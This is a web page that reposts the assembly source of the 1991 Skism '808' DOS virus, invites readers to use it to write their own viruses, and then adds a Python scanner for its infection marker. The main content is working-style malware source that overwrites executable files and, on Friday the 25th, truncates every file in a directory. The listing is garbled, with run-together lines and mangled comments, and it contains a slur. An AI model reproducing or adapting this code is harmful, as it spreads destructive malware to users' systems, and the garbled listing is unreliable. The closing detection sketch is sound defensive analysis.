The 808 Virus
Here is another virus from Skism. It's a quick overwriting virus, but you can use the source code to write your own viruses.
------------------------------------------------------------------------------
The Skism 808 Virus. Created 1991 by Smart Kids Into Sick Methods.
Filename EQU 30; Used to Find File NameFileAttr EQU 21; Used to Find File AttributeSfileDate EQU 24; Used to Find File DateTime EQU 22; Used to Find File Time
Code_start EQU 0100H; start of all.com filesvirus_size EQU 808; TR 808
Code Segment 'Code'Assume CS: Code, DS: Code, ES: Codeorg Code_Start
Main Proc Near
JMP Virus_Start
Encrypt_val db 00h
Virus_Start:
Call Encrypt; Encrypt / Decrypt Filejmp Virus; Go to Start of Code
ENCRYPT:
Push CXMOV BX, Offset Virus_code; Start Encryption At Data
XOR_LOOP:
mov ch, [bx]; read current bytexor ch, encrypt_val; get encryption keymov [bx], ch; switch bytesinc bx; move bx up a bytecmp bx, offset virus_code virus_size; are we done with the encryptionjle xor_loop; no keep? GoingPoP Cxret
Infectfile:
mov dx, code_start; where virus starts in memorymov bx, handle; load bx with handlepush bx; save handle stackcall encrypt on; encrypt filepop bx; get back bxmov cx, virus_size; number of bytes to writemov ah, 40h; write to fileint 21h ; push bxcall encrypt; fix up the messpop bxret
Virus_code:
Wildcards db "*", 0; search for directory argumentfilespec db "* .exe", 0; search for exe file argumentfilespec2 db "*. *", 0RootDir DB "/", 0; Argument for root DirectoryDiData DB 43 DUP (? ); holds directory DTAfiledata db 43 dup ();? holds files DTAdiskdtaseg dw;? holds disk dta segmentdiskdtaofs dw;? holds disk dta offsettempofs dw;? holds offsettempseg dw;? holds segmentdrivecode db;? holds drive codecurrentdir db 64 dup (? ); save current directory into thishandle dw; holds file handleorig_time dw; holds file timeorig_date dw; holds file dateorig_attr dw; holds file attridbuffer dw 2 dup (); holds virus idvirus?????:
MOV AX, 3000H; Get Dos Versionint 21h; CMP Al, 02H; IS IT AT Least 2.00? JB Bus1; Won't Infect Less Than 2.00mov AH, 2CH; Get TimeInt 21h; MOV Encrypt_Val, DL; Save M_Seconds To Encrypt Val So; Theres 100 Mutations PossIBLESETDTA:
MOV DX, OFFSET DIRDATA; Offset of Where to Hold New DTAMOV AH, 1AH; SET DTA Addressint 21h
Newdir:
mov ah, 19h; get drive codeint 21h; mov dl, al; save drivecodeinc dl; add one to dl, because functions differmov ah, 47h; get current directorymov si, offset currentdir; buffer to save directory inint 21h;
Mov DX, Offset Rootdir; Move Dx To Change to Root Directorymov AH, 3BH; Change Directory To Rootint 21h;
Scandirs:
MOV CX, 13H; Include Hidden / Ro DirectorySmov DX, Offset Wildcards; Look for '*' MOV AH, 4EH; Find First Fileint 21h; CMP AX, 12H; NO FIRST FILE? JNE DIRLOOP; No Dirs Found? bail out
Bus1:
JMP bus
Dirloop:
MOV AH, 4FH; Find Next Fileint 21h; CMP AX, 12HJE BUS; No More Dirs Found, Roll Out
Chdir:
MOV DX, OFFSET DIRDATA FileName; Point DX TO FCB - Filenamemov AH, 3BH; Change Directoryint 21h
mov ah, 2fh; get current dta addressint 21h; mov [diskdtaseg], es; save old segmentmov [diskdtaofs], bx; save old offsetmov dx, offset filedata; offset of where to hold new dtamov ah, 1ah; set dta addressint 21h Scandir:
MOV CX, 07H; FIND ANY AttributeMov DX, Offset Filespec; Point Dx to "* .com", 0mov AH, 4EH; Find First File Functionint 21h; CMP AX, 12H; WAS File Found? JNE Transform
NEXTEXE:
MOV AH, 4FH; Find Next Fileint 21h; CMP AX, 12H; None Foundjne Transform; Found See What We Can DO
mov dx, offset rootdir; move dx to change to root directorymov ah, 3bh; change directory to rootint 21h; mov ah, 1ah; set dta addressmov ds, [diskdtaseg]; restore old segmentmov dx, [diskdtaofs]; restore old offsetint 21h JMP Dirloop
BUS:
JMP rollout
TRANSFORM:
MOV AH, 2FH; Temporally Store DTAINT 21H; MOV [Tempseg], ES; Save Old Segmentmov [Tempofs], BX; Save Old OffsetMov DX, Offset FileData FileName
MOV BX, Offset FileData; Save File ... MOV AX, [BX] FileDate; Datemov Orig_Date, Ax; Mov AX, [BX] FileTime; Timemov ORIG_TIME, AX; Andmov AX, [BX] FileAttr; MOV AX , 4300hint 21hmov orig_attr, cxmov ax, 4301h; change attributesxor cx, cx; clear attributesint 21h; mov ax, 3d00h; open file - readint 21h; jc fixup; error - find another filemov handle, ax; save handlemov ah, 3fh; read From Filemov BX, Handle; Move Handle to Bxmov CX, 02H; Read 2 Bytesmov DX, Offset IDBuffer; Save to Bufferint 21h;
MOV AH, 3EH; Close File for NOWMOV BX, HANDLE; LOAD BX with HANDLEINT 21H;
MOV BX, IDBuffer; Fill Bx with ID StringCMP BX, 02EBH; Infected? JNE DOIT; Same - Find Another File
FIXUP: MOV AH, 1AH; Set DTA Addressmov DS, [Tempseg]; Restore Old Segmentmov DX, [Tempofs]; Restore Old Offsetint 21h; JMP NEXTEXE
DOIT:
MOV DX, OFFSET FileData FileNamemov AX, 3D02H; Open File Read / Write Accessint 21h; Mov Handle, Ax; Save HandleCall InfectFile
; MOV AX, 3EH; Close File; INT 21h
ROLLOUT:
MOV AX, 5701H; Restore Originalmov BX, Handle; MOV CX, Orig_Time; Time Andmov DX, Orig_Date; Dateint 21h
mov ax, 4301h; restore original attributesmov cx, orig_attrmov dx, offset filedata filenameint 21h; mov bx, handle; mov ax, 3eh; close file; int 21hmov ah, 3bh; try to fix thismov dx, offset rootdir; for speedint 21h AH, 3BH; Change DirectoryMov DX, Offset Currentdir; Back to Originalint 21h; MOV AH, 2AH; Check System Dateint 21h; CMP CX, 1991; Is IT at Least 1991? JB Audi; NO? Don't do it Nowcmp DL, 25; IS IT THE 25th? JB Audi; Not Yet? Quitcmp Al, 5; Is Friday? JNE AUDI; NO? Quitmov DX, Offset Dirdata; Offset of Where To Hold New DTAMOV AH, 1AH; SET DTA Addressint 21h; MOV AH, 4EH; Find First Filemov CX, 7H; MOV DX, OFFSET FILESPEC2; Offset *. *
LOOPS:
INT 21H; JC AUDI; Error? Then Quitmov AX, 4301H; Find All Normal FileSxor CX, CX; INT 21H; MOV DX, OFFSET DIRDATA FILENAMEMOV AH, 3CH; Fuck Up All Files in Current Dirint 21h; JC AUDI; ERROR? Quitmov AH, 4FH; Find next filejmp loops;
AUDI:
MOV AX, 4C00H; End Programint 21h;
; The below is just text to pad out the virus size to 808 bytes. Don't just change the text and claim that this is your creation.
Words_ DB "SKISM RYTHEM Stack Virus-808. Smart Kids Into Sick Methods", 0Words2 DB "DONT ALTER This Code Into Your Own Strain, Faggit.", 0Words3 DB "HR / SSS NYCITY, this is The Fifth of Many, Many More .... ", 0Words4 DB" You Sissys ..... ", 0
Main Endpcode endsend main
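The listing exposes two traits a scanner can key on: the 02EBh word it checks at the start of a file before infecting, and a single-byte XOR whose key comes from the clock's hundredths field, so only 100 values are possible. The Python sketch below is an added detection example, not part of the original listing. Its sample buffer is constructed filler, and it assumes the padding text `Virus-808` shown at the end of the listing is present in the encrypted body.

```python
"""Detection sketch for the 808 pattern. Constructed data only, no virus code."""
from typing import Optional

MARKER = b"\xeb\x02"       # the word the listing compares as 02EBh (little-endian)
VIRUS_SIZE = 808           # virus_size EQU 808 in the listing
KNOWN_TEXT = b"virus-808"  # assumption: padding text from the listing, lowercased


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the same transform the listing's XOR_LOOP applies."""
    return bytes(b ^ key for b in data)


def scan(data: bytes) -> Optional[int]:
    """Return the XOR key (0..99) if the buffer matches the pattern, else None.

    Key 0 is a valid hit, so callers must test the result with `is None`.
    """
    # An overwriting infector replaces the first 808 bytes of the host,
    # so anything shorter, or without the marker, cannot match.
    if len(data) < VIRUS_SIZE or data[:2] != MARKER:
        return None
    body = data[:VIRUS_SIZE]
    # Brute-force the 100 possible keys and look for the known plaintext.
    # The hyphen and digits in KNOWN_TEXT keep the case-insensitive match
    # from also accepting key ^ 0x20 (which only flips letter case).
    for key in range(100):
        if KNOWN_TEXT in xor_bytes(body, key).lower():
            return key
    return None


def make_sample(key: int) -> bytes:
    """Constructed 808-byte test buffer: marker, filler, XOR-ed text."""
    head = MARKER + b"\x90" * 62  # plaintext head, filler bytes only
    text = b"Skism Rythem Stack Virus-808".ljust(VIRUS_SIZE - len(head), b".")
    return head + xor_bytes(text, key)


if __name__ == "__main__":
    print("encrypted sample, key:", scan(make_sample(37)))
    print("marker only, no text :", scan(MARKER + bytes(900)))
```

A hit on the marker alone is weak evidence, since `EB 02` is an ordinary short jump; the scanner only reports a match when one of the 100 keys also recovers the known text.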